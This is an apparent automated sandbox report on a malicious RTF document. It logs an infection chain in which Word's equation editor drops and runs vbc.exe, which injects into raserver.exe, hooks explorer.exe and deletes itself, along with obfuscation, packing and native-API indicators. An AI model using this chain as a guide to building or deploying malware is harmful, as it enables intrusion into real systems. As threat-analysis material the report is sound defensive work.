Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EDE6C1		6_2_01EDE6C1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED4680		6_2_01ED4680
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F1A634		6_2_01F1A634
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F72622		6_2_01F72622
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EE69FE		6_2_01EE69FE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED29B2		6_2_01ED29B2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F7098E		6_2_01F7098E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F55955		6_2_01F55955
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F5394B		6_2_01F5394B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F6F8EE		6_2_01F6F8EE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F4F8C4		6_2_01F4F8C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EF286D		6_2_01EF286D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EDC85C		6_2_01EDC85C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F5DBDA		6_2_01F5DBDA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ECFBD7		6_2_01ECFBD7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F7CBA4		6_2_01F7CBA4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EF7B00		6_2_01EF7B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F83A83		6_2_01F83A83
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F6FDDD		6_2_01F6FDDD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EDCD5B		6_2_01EDCD5B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F00D3B		6_2_01F00D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F42FDC		6_2_01F42FDC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F6CFB1		6_2_01F6CFB1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EFDF7C		6_2_01EFDF7C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EE0F3F		6_2_01EE0F3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EEEE4C		6_2_01EEEE4C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F02E2F		6_2_01F02E2F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DE4E9		6_2_000DE4E9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DE59C		6_2_000DE59C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DD5A3		6_2_000DD5A3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DDB58		6_2_000DDB58
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000C2D89		6_2_000C2D89
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000C2D90		6_2_000C2D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DEDAD		6_2_000DEDAD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DDE45		6_2_000DDE45
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000C9E5C		6_2_000C9E5C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000C9E60		6_2_000C9E60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000C2FB0		6_2_000C2FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01ECDF5C appears 121 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F3F970 appears 84 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01ECE2A8 appears 38 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F1373B appears 245 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F13F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A4DF5C appears 123 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A9373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A93F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00ABF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A4E2A8 appears 41 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A360 NtCreateFile,		4_2_0041A360
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A410 NtReadFile,		4_2_0041A410
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A490 NtClose,		4_2_0041A490
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A540 NtAllocateVirtualMemory,		4_2_0041A540
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A40A NtReadFile,		4_2_0041A40A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A53C NtAllocateVirtualMemory,		4_2_0041A53C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A400C4 NtCreateFile,LdrInitializeThunk,		4_2_00A400C4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A40078 NtResumeThread,LdrInitializeThunk,		4_2_00A40078
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,		4_2_00A40048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3F9F0 NtClose,LdrInitializeThunk,		4_2_00A3F9F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3F900 NtReadFile,LdrInitializeThunk,		4_2_00A3F900
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,		4_2_00A3FAE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		4_2_00A3FAD0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,		4_2_00A3FBB8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,		4_2_00A3FB68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,		4_2_00A3FC90
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,		4_2_00A3FC60
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,		4_2_00A3FD8C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,		4_2_00A3FDC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,		4_2_00A3FEA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		4_2_00A3FED0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,		4_2_00A3FFB4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A410D0 NtOpenProcessToken,		4_2_00A410D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A40060 NtQuerySection,		4_2_00A40060
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A401D4 NtSetValueKey,		4_2_00A401D4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A4010C NtOpenDirectoryObject,		4_2_00A4010C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A41148 NtOpenThread,		4_2_00A41148
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A407AC NtCreateMutant,		4_2_00A407AC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3F8CC NtWaitForSingleObject,		4_2_00A3F8CC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A41930 NtSetContextThread,		4_2_00A41930
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3F938 NtWriteFile,		4_2_00A3F938
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FAB8 NtQueryValueKey,		4_2_00A3FAB8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FA20 NtQueryInformationFile,		4_2_00A3FA20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FA50 NtEnumerateValueKey,		4_2_00A3FA50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FBE8 NtQueryVirtualMemory,		4_2_00A3FBE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FB50 NtCreateKey,		4_2_00A3FB50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FC30 NtOpenProcess,		4_2_00A3FC30
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A40C40 NtGetContextThread,		4_2_00A40C40
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FC48 NtSetInformationFile,		4_2_00A3FC48
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A41D80 NtSuspendThread,		4_2_00A41D80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FD5C NtEnumerateKey,		4_2_00A3FD5C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FE24 NtWriteVirtualMemory,		4_2_00A3FE24
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FFFC NtCreateProcessEx,		4_2_00A3FFFC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A3FF34 NtQueueApcThread,		4_2_00A3FF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC00C4 NtCreateFile,LdrInitializeThunk,		6_2_01EC00C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC07AC NtCreateMutant,LdrInitializeThunk,		6_2_01EC07AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBF9F0 NtClose,LdrInitializeThunk,		6_2_01EBF9F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBF900 NtReadFile,LdrInitializeThunk,		6_2_01EBF900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,		6_2_01EBFBB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,		6_2_01EBFB68
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFB50 NtCreateKey,LdrInitializeThunk,		6_2_01EBFB50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,		6_2_01EBFAE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		6_2_01EBFAD0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,		6_2_01EBFAB8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,		6_2_01EBFDC0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,		6_2_01EBFD8C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,		6_2_01EBFC60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,		6_2_01EBFFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		6_2_01EBFED0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC01D4 NtSetValueKey,		6_2_01EC01D4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC1148 NtOpenThread,		6_2_01EC1148
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC010C NtOpenDirectoryObject,		6_2_01EC010C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC10D0 NtOpenProcessToken,		6_2_01EC10D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC0060 NtQuerySection,		6_2_01EC0060
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC0078 NtResumeThread,		6_2_01EC0078
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC0048 NtProtectVirtualMemory,		6_2_01EC0048
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBF938 NtWriteFile,		6_2_01EBF938
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC1930 NtSetContextThread,		6_2_01EC1930
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBF8CC NtWaitForSingleObject,		6_2_01EBF8CC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFBE8 NtQueryVirtualMemory,		6_2_01EBFBE8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFA50 NtEnumerateValueKey,		6_2_01EBFA50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFA20 NtQueryInformationFile,		6_2_01EBFA20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC1D80 NtSuspendThread,		6_2_01EC1D80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFD5C NtEnumerateKey,		6_2_01EBFD5C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFC90 NtUnmapViewOfSection,		6_2_01EBFC90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFC48 NtSetInformationFile,		6_2_01EBFC48
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EC0C40 NtGetContextThread,		6_2_01EC0C40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFC30 NtOpenProcess,		6_2_01EBFC30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFFFC NtCreateProcessEx,		6_2_01EBFFFC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFF34 NtQueueApcThread,		6_2_01EBFF34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFEA0 NtReadVirtualMemory,		6_2_01EBFEA0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EBFE24 NtWriteVirtualMemory,		6_2_01EBFE24
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DA360 NtCreateFile,		6_2_000DA360
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DA410 NtReadFile,		6_2_000DA410
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DA490 NtClose,		6_2_000DA490
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DA540 NtAllocateVirtualMemory,		6_2_000DA540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DA40A NtReadFile,		6_2_000DA40A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DA53C NtAllocateVirtualMemory,		6_2_000DA53C

PE file contains executable resources (Code or Archives)

Source: vbc[1].exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: vbc.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: vbc[1].exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Sample is known by Antivirus

Source: 3nkW4MtwSD.rtf

Virustotal: Detection: 56%

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$kW4MtwSD.rtf

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winRTF@10/9@3/2

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Binary contains paths to development resources

Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker

Source: vbc[1].exe.1.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.1.dr, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.3.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.10.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.4.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.8.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.1090000.5.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.2.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.1090000.6.unpack, MegaMan.LevelEditor/MainForm.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041685A push C1F93286h; ret		4_2_0041685F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041D4B5 push eax; ret		4_2_0041D508
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041D56C push eax; ret		4_2_0041D572
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041D502 push eax; ret		4_2_0041D508
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041D50B push eax; ret		4_2_0041D572
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041660F push ss; retf		4_2_00416624
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040B75A push esp; retf		4_2_0040B75C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A4DFA1 push ecx; ret		4_2_00A4DFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ECDFA1 push ecx; ret		6_2_01ECDFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DD4B5 push eax; ret		6_2_000DD508
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DD50B push eax; ret		6_2_000DD572
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DD502 push eax; ret		6_2_000DD508
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000DD56C push eax; ret		6_2_000DD572
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000D660F push ss; retf		6_2_000D6624
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000CB75A push esp; retf		6_2_000CB75C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_000D685A push C1F93286h; ret		6_2_000D685F

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.77893217222
Source: initial sample	Static PE information: section name: .text entropy: 7.77893217222

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
